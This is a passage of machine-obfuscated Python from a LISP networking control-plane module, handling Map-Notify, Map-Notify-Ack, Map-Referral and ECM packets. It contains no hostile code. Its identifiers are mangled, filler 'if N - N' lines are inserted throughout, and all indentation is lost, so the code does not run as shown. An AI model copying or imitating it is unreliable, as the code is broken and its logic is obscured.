if 49 - 49: II111iiii . I1ii11iIi11i * OoOoOO00 - OOooOOo
IIIii1i = I11iiI1III . rloc_set [ 0 ] . stats if len ( I11iiI1III . rloc_set ) != 0 else None
if 2 - 2: OOooOOo - II111iiii + i11iIiiIii
if 69 - 69: o0oOOo0O0Ooo
if 14 - 14: Oo0Ooo % O0 % O0 . o0oOOo0O0Ooo
if 34 - 34: i11iIiiIii + O0
iIIiI11 = lisp_rloc ( )
iIIiI11 . store_rloc_from_record ( ooOoooO , None , I11iiI1III . mapping_source )
if ( IIIii1i != None ) : iIIiI11 . stats = copy . deepcopy ( IIIii1i )
if 3 - 3: iIii1I11I1II1
if ( iIi11Ii and iIIiI11 . is_rtr ( ) == False ) : continue
if 15 - 15: Oo0Ooo / IiII % i11iIiiIii * I11i . iIii1I11I1II1
I11iiI1III . rloc_set = [ iIIiI11 ]
I11iiI1III . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11iiI1III )
if 97 - 97: I1Ii111
lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( I11iiI1III . print_eid_tuple ( ) , False ) ,
# Oo0Ooo . II111iiii / i11iIiiIii - Oo0Ooo
iIIiI11 . rle . print_rle ( False , True ) ) )
if 47 - 47: iII111i * ooOoO0o . I1IiiI / O0
if 81 - 81: iII111i + I11i - I1ii11iIi11i + iIii1I11I1II1 / ooOoO0o
return
if 60 - 60: iIii1I11I1II1 - OoO0O00
if 11 - 11: IiII + I1IiiI . Ii1I * I1IiiI - OoooooooOO . II111iiii
if 74 - 74: o0oOOo0O0Ooo . iIii1I11I1II1 * Ii1I / O0 - I1Ii111 % oO0o
if 98 - 98: IiII
if 30 - 30: iIii1I11I1II1 - ooOoO0o / iIii1I11I1II1 / I1IiiI + OoOoOO00 - iIii1I11I1II1
if 69 - 69: i11iIiiIii . O0
if 21 - 21: i1IIi . OoO0O00 % I11i + II111iiii % o0oOOo0O0Ooo
if 17 - 17: i11iIiiIii + oO0o * iII111i . II111iiii
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
i1111 = lisp_map_notify ( "" )
Oo00oo = i1111 . decode ( orig_packet )
if ( Oo00oo == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 44 - 44: I1ii11iIi11i
if 39 - 39: iII111i + Oo0Ooo / oO0o
i1111 . print_notify ( )
if 95 - 95: I1Ii111 * oO0o / ooOoO0o . Ii1I . OoOoOO00
if 99 - 99: I1IiiI * II111iiii
if 84 - 84: II111iiii - I1IiiI
if 41 - 41: iIii1I11I1II1 % I1Ii111 % OoOoOO00
if 35 - 35: I11i + i1IIi
I111 = source . print_address ( )
if ( i1111 . alg_id != 0 or i1111 . auth_len != 0 ) :
oO00000oOO = None
for III in lisp_map_servers_list :
if ( III . find ( I111 ) == - 1 ) : continue
oO00000oOO = lisp_map_servers_list [ III ]
if 85 - 85: Ii1I * Ii1I . OoOoOO00 / Oo0Ooo
if ( oO00000oOO == None ) :
lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( I111 ) )
if 97 - 97: oO0o % iIii1I11I1II1
return
if 87 - 87: II111iiii % I1IiiI + oO0o - I11i / I11i
if 16 - 16: I1IiiI
oO00000oOO . map_notifies_received += 1
if 39 - 39: ooOoO0o * II111iiii
I1Iii1IIIiiiI = lisp_verify_auth ( Oo00oo , i1111 . alg_id ,
i1111 . auth_data , oO00000oOO . password )
if 90 - 90: OoooooooOO * ooOoO0o
lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if I1Iii1IIIiiiI else "failed" ) )
if 14 - 14: I1IiiI % i1IIi
if ( I1Iii1IIIiiiI == False ) : return
else :
oO00000oOO = lisp_ms ( I111 , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
None )
if 35 - 35: ooOoO0o % o0oOOo0O0Ooo % ooOoO0o
if 77 - 77: OOooOOo % I1Ii111 / i11iIiiIii . i1IIi % OOooOOo
if 55 - 55: i1IIi
if 64 - 64: oO0o . OOooOOo * i11iIiiIii + I1Ii111
if 88 - 88: O0
if 75 - 75: iII111i - Oo0Ooo / OoooooooOO - O0
O00o0Oo = i1111 . eid_records
if ( i1111 . record_count == 0 ) :
lisp_send_map_notify_ack ( lisp_sockets , O00o0Oo , i1111 , oO00000oOO )
return
if 36 - 36: OoO0O00 % Ii1I . Oo0Ooo
if 90 - 90: i11iIiiIii - iII111i * oO0o
if 79 - 79: IiII
if 38 - 38: I1Ii111
if 56 - 56: i11iIiiIii
if 58 - 58: i11iIiiIii / OoOoOO00
if 23 - 23: I1IiiI % iIii1I11I1II1 - oO0o - iII111i - o0oOOo0O0Ooo
if 39 - 39: Oo0Ooo . OoO0O00
o0o0Ooo0OO00o = lisp_eid_record ( )
Oo00oo = o0o0Ooo0OO00o . decode ( O00o0Oo )
if ( Oo00oo == None ) : return
if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
o0o0Ooo0OO00o . print_record ( " " , False )
if 100 - 100: ooOoO0o / OoooooooOO
for I1I1II1iI in range ( o0o0Ooo0OO00o . rloc_count ) :
ooOoooO = lisp_rloc_record ( )
Oo00oo = ooOoooO . decode ( Oo00oo , None )
if ( Oo00oo == None ) :
lprint ( " Could not decode RLOC-record in Map-Notify packet" )
return
if 73 - 73: i11iIiiIii - Oo0Ooo
ooOoooO . print_record ( " " )
if 100 - 100: iIii1I11I1II1 + I1Ii111
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
if 84 - 84: Oo0Ooo * OoOoOO00 / Ii1I / IiII / o0oOOo0O0Ooo . I1ii11iIi11i
if 81 - 81: I1IiiI
if ( o0o0Ooo0OO00o . group . is_null ( ) == False ) :
if 82 - 82: I1Ii111 - OoooooooOO - Ii1I
if 34 - 34: OOooOOo . iIii1I11I1II1 / I1IiiI . Oo0Ooo - iIii1I11I1II1
if 83 - 83: iII111i - I1ii11iIi11i + iII111i
if 4 - 4: o0oOOo0O0Ooo % iIii1I11I1II1 + I11i
if 60 - 60: I1ii11iIi11i / I1Ii111 % i11iIiiIii % oO0o % I1IiiI . Oo0Ooo
lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( o0o0Ooo0OO00o . print_eid_tuple ( ) , False ) ) )
if 20 - 20: IiII - OOooOOo + OoOoOO00
if 83 - 83: OoooooooOO / I1IiiI + iII111i - iIii1I11I1II1 % ooOoO0o
OO = lisp_control_packet_ipc ( orig_packet , I111 , "lisp-itr" , 0 )
lisp_ipc ( OO , lisp_sockets [ 2 ] , "lisp-core-pkt" )
if 74 - 74: OoO0O00
if 13 - 13: I1ii11iIi11i / OoO0O00
if 90 - 90: iIii1I11I1II1 - OoO0O00 . i1IIi / o0oOOo0O0Ooo + O0
if 94 - 94: IiII * i1IIi
if 90 - 90: O0 % I1IiiI . o0oOOo0O0Ooo % ooOoO0o % I1IiiI
lisp_send_map_notify_ack ( lisp_sockets , O00o0Oo , i1111 , oO00000oOO )
return
if 16 - 16: OoO0O00 / OOooOOo / iIii1I11I1II1 / OoooooooOO . oO0o - I1Ii111
if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
if 4 - 4: iIii1I11I1II1 - iIii1I11I1II1 * I11i
if 32 - 32: I1IiiI + II111iiii * iII111i + O0 / O0 * Oo0Ooo
if 64 - 64: i11iIiiIii / iII111i + i11iIiiIii . I11i
if 66 - 66: i1IIi
if 98 - 98: Oo0Ooo / iIii1I11I1II1
def lisp_process_map_notify_ack ( packet , source ) :
i1111 = lisp_map_notify ( "" )
packet = i1111 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify-Ack packet" )
return
if 33 - 33: O0 - iII111i
if 40 - 40: iII111i * I11i
i1111 . print_notify ( )
if 25 - 25: O0 * o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 87 - 87: OoOoOO00
if 30 - 30: IiII % OoOoOO00 + I1Ii111
if 13 - 13: iII111i * Ii1I % o0oOOo0O0Ooo * i1IIi . IiII % i1IIi
if 79 - 79: OoooooooOO % I11i / o0oOOo0O0Ooo + IiII + O0 + iII111i
if ( i1111 . record_count < 1 ) :
lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
return
if 87 - 87: I11i
if 39 - 39: I1ii11iIi11i * i11iIiiIii % I1Ii111
o0o0Ooo0OO00o = lisp_eid_record ( )
if 72 - 72: OoO0O00 * Oo0Ooo - IiII
if ( o0o0Ooo0OO00o . decode ( i1111 . eid_records ) == None ) :
lprint ( "Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack" )
return
if 74 - 74: Ii1I
o0o0Ooo0OO00o . print_record ( " " , False )
if 26 - 26: I11i . O0
i1iiii = o0o0Ooo0OO00o . print_eid_tuple ( )
if 68 - 68: Ii1I
if 26 - 26: o0oOOo0O0Ooo - I1ii11iIi11i / O0 % i11iIiiIii
if 7 - 7: I1Ii111 . Oo0Ooo + IiII / iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 - O0 . iII111i - IiII - ooOoO0o
if ( i1111 . alg_id != LISP_NONE_ALG_ID and i1111 . auth_len != 0 ) :
i1iI11i = lisp_sites_by_eid . lookup_cache ( o0o0Ooo0OO00o . eid , True )
if ( i1iI11i == None ) :
oo0oO0Oo = bold ( "Site not found" , False )
lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( oo0oO0Oo , green ( i1iiii , False ) ) )
if 54 - 54: OoO0O00 . iII111i . OoOoOO00 * OoO0O00 + o0oOOo0O0Ooo . ooOoO0o
return
if 44 - 44: I11i * iIii1I11I1II1 . I1ii11iIi11i
I1io0oOOooOoo0oO = i1iI11i . site
if 9 - 9: o0oOOo0O0Ooo
if 23 - 23: ooOoO0o * OoO0O00 + O0 % I1Ii111
if 21 - 21: Ii1I * OoOoOO00
if 29 - 29: iIii1I11I1II1 / ooOoO0o
I1io0oOOooOoo0oO . map_notify_acks_received += 1
if 75 - 75: OoooooooOO + I1IiiI % OoOoOO00 / O0 - IiII
IiII11iI1 = i1111 . key_id
if ( IiII11iI1 in I1io0oOOooOoo0oO . auth_key ) :
I1Ii1II1I11II = I1io0oOOooOoo0oO . auth_key [ IiII11iI1 ]
else :
I1Ii1II1I11II = ""
if 88 - 88: OoO0O00 % Ii1I
if 12 - 12: OoooooooOO . O0
I1Iii1IIIiiiI = lisp_verify_auth ( packet , i1111 . alg_id ,
i1111 . auth_data , I1Ii1II1I11II )
if 33 - 33: OoooooooOO / I11i . II111iiii * i1IIi
IiII11iI1 = "key-id {}" . format ( IiII11iI1 ) if IiII11iI1 == i1111 . key_id else "bad key-id {}" . format ( i1111 . key_id )
if 34 - 34: i11iIiiIii / OoOoOO00
if 100 - 100: o0oOOo0O0Ooo - I1IiiI / I11i
lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if I1Iii1IIIiiiI else "failed" , IiII11iI1 ) )
if 43 - 43: o0oOOo0O0Ooo % iIii1I11I1II1
if ( I1Iii1IIIiiiI == False ) : return
if 85 - 85: oO0o + OoooooooOO - IiII % o0oOOo0O0Ooo * ooOoO0o * II111iiii
if 4 - 4: Ii1I . i1IIi + Oo0Ooo % I11i . OoO0O00
if 70 - 70: OOooOOo * OoOoOO00 / OoOoOO00 / OoOoOO00
if 23 - 23: I1IiiI
if 24 - 24: I1Ii111 * i1IIi % O0 * Ii1I + iII111i
if ( i1111 . retransmit_timer ) : i1111 . retransmit_timer . cancel ( )
if 14 - 14: oO0o * iII111i + Ii1I + Ii1I * IiII
IiIi = source . print_address ( )
III = i1111 . nonce_key
if 82 - 82: IiII * ooOoO0o / OOooOOo + OoOoOO00
if ( III in lisp_map_notify_queue ) :
i1111 = lisp_map_notify_queue . pop ( III )
if ( i1111 . retransmit_timer ) : i1111 . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( III ) )
if 32 - 32: IiII
else :
lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( i1111 . nonce_key , red ( IiIi , False ) ) )
if 90 - 90: I1ii11iIi11i / I11i * o0oOOo0O0Ooo % O0 * i11iIiiIii
if 68 - 68: I11i . Ii1I + I11i / IiII . I11i / iIii1I11I1II1
return
if 96 - 96: O0
if 2 - 2: OoO0O00 / iII111i + o0oOOo0O0Ooo
if 27 - 27: I11i - OoOoOO00 - ooOoO0o - I1IiiI
if 51 - 51: I11i + I11i + O0 + O0 * I1Ii111
if 61 - 61: IiII . O0
if 38 - 38: Ii1I * I1ii11iIi11i - i11iIiiIii + ooOoO0o * I11i
if 74 - 74: OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: ooOoO0o + I1ii11iIi11i * i11iIiiIii / i1IIi
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
if ( action not in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) : return ( False )
if 95 - 95: oO0o / IiII * II111iiii * Ii1I . OoO0O00 . OoO0O00
if ( mr . last_cached_prefix [ 0 ] == None ) : return ( False )
if 85 - 85: I1IiiI / II111iiii * OoO0O00 + ooOoO0o / OoO0O00 % OOooOOo
if 100 - 100: I1Ii111 % OoooooooOO % OoOoOO00 % I1IiiI
if 32 - 32: OoO0O00 + OOooOOo . OoO0O00 - Oo0Ooo
if 12 - 12: I1IiiI * OoO0O00 - II111iiii . i1IIi
iiiIIi1I1I1 = False
if ( group . is_null ( ) == False ) :
iiiIIi1I1I1 = mr . last_cached_prefix [ 1 ] . is_more_specific ( group )
if 86 - 86: OOooOOo / OoooooooOO - IiII
if ( iiiIIi1I1I1 == False ) :
iiiIIi1I1I1 = mr . last_cached_prefix [ 0 ] . is_more_specific ( eid )
if 56 - 56: I1ii11iIi11i - i1IIi * OoooooooOO * O0 * I1IiiI - I1Ii111
if 32 - 32: OoooooooOO . OOooOOo . OoO0O00 . IiII / I11i % i1IIi
if ( iiiIIi1I1I1 ) :
o0oo0OO0oO = lisp_print_eid_tuple ( eid , group )
Ii1II1iiI1I = lisp_print_eid_tuple ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] )
if 93 - 93: II111iiii % I1Ii111 . O0 - OoOoOO00 % OoOoOO00
lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( o0oo0OO0oO , False ) , s ,
# O0 % I1IiiI
Ii1II1iiI1I ) )
if 9 - 9: i11iIiiIii + OOooOOo * OoO0O00
return ( iiiIIi1I1I1 )
if 9 - 9: OOooOOo
if 67 - 67: Oo0Ooo / I1Ii111 . ooOoO0o % oO0o / Oo0Ooo
if 49 - 49: ooOoO0o + I1IiiI
if 70 - 70: o0oOOo0O0Ooo + Ii1I . OoO0O00 * Ii1I + OOooOOo + ooOoO0o
if 13 - 13: I1ii11iIi11i
if 97 - 97: oO0o - Oo0Ooo . i11iIiiIii % ooOoO0o * i11iIiiIii - OoooooooOO
if 44 - 44: I11i % OoooooooOO / iII111i - i11iIiiIii * i1IIi * o0oOOo0O0Ooo
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
if 51 - 51: Ii1I + IiII / I1ii11iIi11i + O0 % Ii1I
iiIII111I111 = lisp_map_referral ( )
packet = iiIII111I111 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Referral packet" )
return
if 55 - 55: iII111i % o0oOOo0O0Ooo - oO0o % OoooooooOO
iiIII111I111 . print_map_referral ( )
if 18 - 18: OoooooooOO - I1ii11iIi11i
I111 = source . print_address ( )
o0Oo0o = iiIII111I111 . nonce
if 94 - 94: OOooOOo . Oo0Ooo + Ii1I * o0oOOo0O0Ooo
if 79 - 79: OOooOOo + Oo0Ooo
if 33 - 33: iIii1I11I1II1
if 75 - 75: I1Ii111 / iIii1I11I1II1 . OoooooooOO
for iIi1iIIIiIiI in range ( iiIII111I111 . record_count ) :
o0o0Ooo0OO00o = lisp_eid_record ( )
packet = o0o0Ooo0OO00o . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Referral packet" )
return
if 98 - 98: iIii1I11I1II1 / I1IiiI + i1IIi
o0o0Ooo0OO00o . print_record ( " " , True )
if 80 - 80: II111iiii . Oo0Ooo * oO0o % II111iiii / I1ii11iIi11i
if 66 - 66: iII111i / OoO0O00 / i11iIiiIii
if 99 - 99: OOooOOo
if 51 - 51: i11iIiiIii . o0oOOo0O0Ooo / iII111i
III = str ( o0Oo0o )
if ( III not in lisp_ddt_map_requestQ ) :
lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( o0Oo0o ) , I111 ) )
if 53 - 53: oO0o / i1IIi - Oo0Ooo - i1IIi + IiII
if 79 - 79: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo % iII111i
continue
if 56 - 56: Oo0Ooo % I1ii11iIi11i
iii1i = lisp_ddt_map_requestQ [ III ]
if ( iii1i == None ) :
lprint ( ( "No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( o0Oo0o ) , I111 ) )
if 53 - 53: OoO0O00 . I11i - ooOoO0o
continue
if 11 - 11: I11i + i11iIiiIii / oO0o % oO0o * o0oOOo0O0Ooo / OoOoOO00
if 74 - 74: oO0o . I1Ii111 . II111iiii
if 92 - 92: I1Ii111 % OoooooooOO * I1Ii111
if 78 - 78: Oo0Ooo . I11i . oO0o + O0 / O0
if 41 - 41: iII111i * OoO0O00 - OoO0O00
if 72 - 72: o0oOOo0O0Ooo + oO0o . I1ii11iIi11i + OoO0O00 / I1Ii111
if ( lisp_map_referral_loop ( iii1i , o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
o0o0Ooo0OO00o . action , I111 ) ) :
iii1i . dequeue_map_request ( )
continue
if 58 - 58: Oo0Ooo / II111iiii % OoooooooOO % II111iiii
if 39 - 39: i1IIi
iii1i . last_cached_prefix [ 0 ] = o0o0Ooo0OO00o . eid
iii1i . last_cached_prefix [ 1 ] = o0o0Ooo0OO00o . group
if 16 - 16: OoOoOO00 % iIii1I11I1II1 + Ii1I - o0oOOo0O0Ooo . Oo0Ooo + i1IIi
if 59 - 59: i1IIi
if 37 - 37: OoO0O00 / I1ii11iIi11i / OoOoOO00
if 15 - 15: I1IiiI % iIii1I11I1II1 . I1Ii111
iII11 = False
oooo0o0o00o = lisp_referral_cache_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
True )
if ( oooo0o0o00o == None ) :
iII11 = True
oooo0o0o00o = lisp_referral ( )
oooo0o0o00o . eid = o0o0Ooo0OO00o . eid
oooo0o0o00o . group = o0o0Ooo0OO00o . group
if ( o0o0Ooo0OO00o . ddt_incomplete == False ) : oooo0o0o00o . add_cache ( )
elif ( oooo0o0o00o . referral_source . not_set ( ) ) :
lprint ( "Do not replace static referral entry {}" . format ( green ( oooo0o0o00o . print_eid_tuple ( ) , False ) ) )
if 71 - 71: I11i - Ii1I + i11iIiiIii % I1ii11iIi11i - OoO0O00 - OOooOOo
iii1i . dequeue_map_request ( )
continue
if 71 - 71: OOooOOo
if 27 - 27: OOooOOo * O0 * i11iIiiIii / OoOoOO00 - i1IIi
oOoO0OooO0O = o0o0Ooo0OO00o . action
oooo0o0o00o . referral_source = source
oooo0o0o00o . referral_type = oOoO0OooO0O
O0O00O = o0o0Ooo0OO00o . store_ttl ( )
oooo0o0o00o . referral_ttl = O0O00O
oooo0o0o00o . expires = lisp_set_timestamp ( O0O00O )
if 73 - 73: iII111i / I1IiiI * ooOoO0o
if 85 - 85: I11i + I11i + oO0o - OoOoOO00
if 15 - 15: OoO0O00
if 88 - 88: Ii1I % i1IIi / I1Ii111
i11o00O0OO = oooo0o0o00o . is_referral_negative ( )
if ( I111 in oooo0o0o00o . referral_set ) :
oooO00ooo00 = oooo0o0o00o . referral_set [ I111 ]
if 86 - 86: iIii1I11I1II1 * IiII + I1ii11iIi11i + I1Ii111 . o0oOOo0O0Ooo
if ( oooO00ooo00 . updown == False and i11o00O0OO == False ) :
oooO00ooo00 . updown = True
lprint ( "Change up/down status for referral-node {} to up" . format ( I111 ) )
if 88 - 88: ooOoO0o
elif ( oooO00ooo00 . updown == True and i11o00O0OO == True ) :
oooO00ooo00 . updown = False
lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( I111 ) )
if 4 - 4: i11iIiiIii . Ii1I - oO0o
if 9 - 9: I1Ii111 - i1IIi * I1ii11iIi11i
if 67 - 67: II111iiii * OoO0O00 + OoooooooOO / I11i . oO0o - II111iiii
if 9 - 9: I1ii11iIi11i % I1Ii111 - I1ii11iIi11i + i1IIi
if 6 - 6: I1ii11iIi11i / i11iIiiIii - I11i . OOooOOo
if 44 - 44: iII111i . i1IIi % I1Ii111
if 66 - 66: iIii1I11I1II1
if 86 - 86: o0oOOo0O0Ooo % iIii1I11I1II1
iIoooO00O0 = { }
for III in oooo0o0o00o . referral_set : iIoooO00O0 [ III ] = None
if 89 - 89: ooOoO0o - Ii1I / OoooooooOO
if 29 - 29: Oo0Ooo . IiII / I1ii11iIi11i
if 19 - 19: O0
if 66 - 66: I11i
for iIi1iIIIiIiI in range ( o0o0Ooo0OO00o . rloc_count ) :
ooOoooO = lisp_rloc_record ( )
packet = ooOoooO . decode ( packet , None )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Referral packet" )
return
if 55 - 55: OoO0O00 - I1Ii111 / ooOoO0o . i11iIiiIii / IiII
ooOoooO . print_record ( " " )
if 55 - 55: ooOoO0o + oO0o + OoOoOO00 / O0 * II111iiii * OoOoOO00
if 53 - 53: Oo0Ooo
if 16 - 16: Ii1I
if 73 - 73: i11iIiiIii + I1IiiI - IiII - IiII + IiII . Ii1I
O0O0 = ooOoooO . rloc . print_address ( )
if ( O0O0 not in oooo0o0o00o . referral_set ) :
oooO00ooo00 = lisp_referral_node ( )
oooO00ooo00 . referral_address . copy_address ( ooOoooO . rloc )
oooo0o0o00o . referral_set [ O0O0 ] = oooO00ooo00
if ( I111 == O0O0 and i11o00O0OO ) : oooO00ooo00 . updown = False
else :
oooO00ooo00 = oooo0o0o00o . referral_set [ O0O0 ]
if ( O0O0 in iIoooO00O0 ) : iIoooO00O0 . pop ( O0O0 )
if 78 - 78: OoO0O00 + oO0o
oooO00ooo00 . priority = ooOoooO . priority
oooO00ooo00 . weight = ooOoooO . weight
if 86 - 86: ooOoO0o . ooOoO0o + oO0o
if 84 - 84: OOooOOo - OoOoOO00 + i1IIi * I1ii11iIi11i % I1ii11iIi11i * I1Ii111
if 31 - 31: IiII + iII111i
if 5 - 5: O0 * Ii1I
if 78 - 78: iII111i * iIii1I11I1II1 . OoO0O00 . OoOoOO00 % I1Ii111
for III in iIoooO00O0 : oooo0o0o00o . referral_set . pop ( III )
if 77 - 77: OOooOOo / OoooooooOO
i1iiii = oooo0o0o00o . print_eid_tuple ( )
if 11 - 11: iIii1I11I1II1 - Ii1I - OoOoOO00 . oO0o / I1ii11iIi11i
if ( iII11 ) :
if ( o0o0Ooo0OO00o . ddt_incomplete ) :
lprint ( "Suppress add {} to referral-cache" . format ( green ( i1iiii , False ) ) )
if 79 - 79: i11iIiiIii % o0oOOo0O0Ooo * II111iiii . i1IIi * Ii1I - i11iIiiIii
else :
lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( i1iiii , False ) , o0o0Ooo0OO00o . rloc_count ) )
if 31 - 31: IiII / o0oOOo0O0Ooo
if 27 - 27: Oo0Ooo
else :
lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( i1iiii , False ) , o0o0Ooo0OO00o . rloc_count ) )
if 32 - 32: Oo0Ooo * i11iIiiIii % I1IiiI - i11iIiiIii - I1Ii111 % I1ii11iIi11i
if 35 - 35: o0oOOo0O0Ooo % iII111i / O0 * I1IiiI . o0oOOo0O0Ooo / OOooOOo
if 81 - 81: I1ii11iIi11i - i11iIiiIii
if 49 - 49: iII111i * I11i - II111iiii . o0oOOo0O0Ooo
if 52 - 52: Ii1I + Ii1I - II111iiii . O0 + I1ii11iIi11i
if 60 - 60: i11iIiiIii + IiII
if ( oOoO0OooO0O == LISP_DDT_ACTION_DELEGATION_HOLE ) :
lisp_send_negative_map_reply ( iii1i . lisp_sockets , oooo0o0o00o . eid ,
oooo0o0o00o . group , iii1i . nonce , iii1i . itr , iii1i . sport , 15 , None , False )
iii1i . dequeue_map_request ( )
if 41 - 41: I1Ii111 * o0oOOo0O0Ooo + Oo0Ooo
if 86 - 86: Ii1I / oO0o
if ( oOoO0OooO0O == LISP_DDT_ACTION_NOT_AUTH ) :
if ( iii1i . tried_root ) :
lisp_send_negative_map_reply ( iii1i . lisp_sockets , oooo0o0o00o . eid ,
oooo0o0o00o . group , iii1i . nonce , iii1i . itr , iii1i . sport , 0 , None , False )
iii1i . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( iii1i , True )
if 40 - 40: OoO0O00 % oO0o + Oo0Ooo
if 60 - 60: II111iiii / Ii1I
if 14 - 14: iII111i - Oo0Ooo / o0oOOo0O0Ooo * oO0o / Oo0Ooo - I1IiiI
if ( oOoO0OooO0O == LISP_DDT_ACTION_MS_NOT_REG ) :
if ( I111 in oooo0o0o00o . referral_set ) :
oooO00ooo00 = oooo0o0o00o . referral_set [ I111 ]
oooO00ooo00 . updown = False
if 89 - 89: i1IIi / I1Ii111 + Ii1I - i1IIi
if ( len ( oooo0o0o00o . referral_set ) == 0 ) :
iii1i . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( iii1i , False )
if 66 - 66: OoooooooOO
if 68 - 68: iII111i + I1Ii111
if 90 - 90: o0oOOo0O0Ooo
if ( oOoO0OooO0O in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) :
if ( iii1i . eid . is_exact_match ( o0o0Ooo0OO00o . eid ) ) :
if ( not iii1i . tried_root ) :
lisp_send_ddt_map_request ( iii1i , True )
else :
lisp_send_negative_map_reply ( iii1i . lisp_sockets ,
oooo0o0o00o . eid , oooo0o0o00o . group , iii1i . nonce , iii1i . itr ,
iii1i . sport , 15 , None , False )
iii1i . dequeue_map_request ( )
if 48 - 48: iII111i + Ii1I
else :
lisp_send_ddt_map_request ( iii1i , False )
if 45 - 45: oO0o / iIii1I11I1II1 % O0 % IiII % I1ii11iIi11i
if 89 - 89: OOooOOo - I1Ii111 - iII111i
if 67 - 67: oO0o
if ( oOoO0OooO0O == LISP_DDT_ACTION_MS_ACK ) : iii1i . dequeue_map_request ( )
if 76 - 76: I1IiiI % I1IiiI - IiII / OoOoOO00 / I1ii11iIi11i
return
if 42 - 42: I1IiiI + I1ii11iIi11i + Oo0Ooo * i1IIi - II111iiii
if 15 - 15: o0oOOo0O0Ooo
if 60 - 60: I1ii11iIi11i / I1Ii111
if 13 - 13: I1Ii111
if 52 - 52: II111iiii / OoO0O00 . Ii1I
if 68 - 68: iII111i
if 67 - 67: I1IiiI * I1IiiI
if 100 - 100: iII111i * iII111i . Oo0Ooo
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
III1iI1III1I1 = lisp_ecm ( 0 )
packet = III1iI1III1I1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode ECM packet" )
return
if 10 - 10: Oo0Ooo % ooOoO0o * Oo0Ooo
if 48 - 48: ooOoO0o + II111iiii
III1iI1III1I1 . print_ecm ( )
if 73 - 73: II111iiii
IiIii1iIIII = lisp_control_header ( )
if ( IiIii1iIIII . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return
if 63 - 63: i11iIiiIii . Oo0Ooo . OOooOOo - II111iiii
if 35 - 35: II111iiii + IiII
oO0Oo0oO00O = IiIii1iIIII . type
del ( IiIii1iIIII )
if 54 - 54: IiII - Oo0Ooo
if ( oO0Oo0oO00O != LISP_MAP_REQUEST ) :
lprint ( "Received ECM without Map-Request inside" )
return
if 55 - 55: I11i * OOooOOo * I1ii11iIi11i . i11iIiiIii
if 93 - 93: Oo0Ooo % i11iIiiIii / i11iIiiIii . II111iiii % I11i
if 13 - 13: O0 . i1IIi - OoooooooOO . oO0o
if 38 - 38: ooOoO0o . i1IIi / iII111i + I1IiiI - II111iiii
if 21 - 21: i11iIiiIii + II111iiii - i1IIi / OoooooooOO * OOooOOo % Oo0Ooo
o000O000o0O = III1iI1III1I1 . udp_sport
iIIi1iiii1ii = time . time ( )
lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
III1iI1III1I1 . source , o000O000o0O , III1iI1III1I1 . ddt , - 1 , iIIi1iiii1ii )
return
if 62 - 62: O0 . O0 + i11iIiiIii
if 57 - 57: II111iiii . I1IiiI . OOooOOo / IiII . II111iiii
if 80 - 80: I11i * OoO0O00 + ooOoO0o % ooOoO0o
if 16 - 16: iII111i / i11iIiiIii + iIii1I11I1II1
if 76 - 76: OoooooooOO / Oo0Ooo / I1Ii111 + OoooooooOO
if 65 - 65: Oo0Ooo - I1Ii111
if 57 - 57: O0
if 49 - 49: I1ii11iIi11i / OoOoOO00 - I1IiiI + iII111i . OOooOOo % oO0o
if 34 - 34: OoO0O00 - I1IiiI + OoOoOO00
if 22 - 22: iIii1I11I1II1 . i1IIi . OOooOOo % Oo0Ooo - i1IIi
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
if 78 - 78: I1IiiI / i1IIi % II111iiii % I1IiiI % Ii1I
if 29 - 29: i1IIi % o0oOOo0O0Ooo + OOooOOo / Oo0Ooo
if 38 - 38: IiII . I1Ii111
if 69 - 69: ooOoO0o + OoOoOO00 + II111iiii % I1Ii111 + Ii1I . ooOoO0o
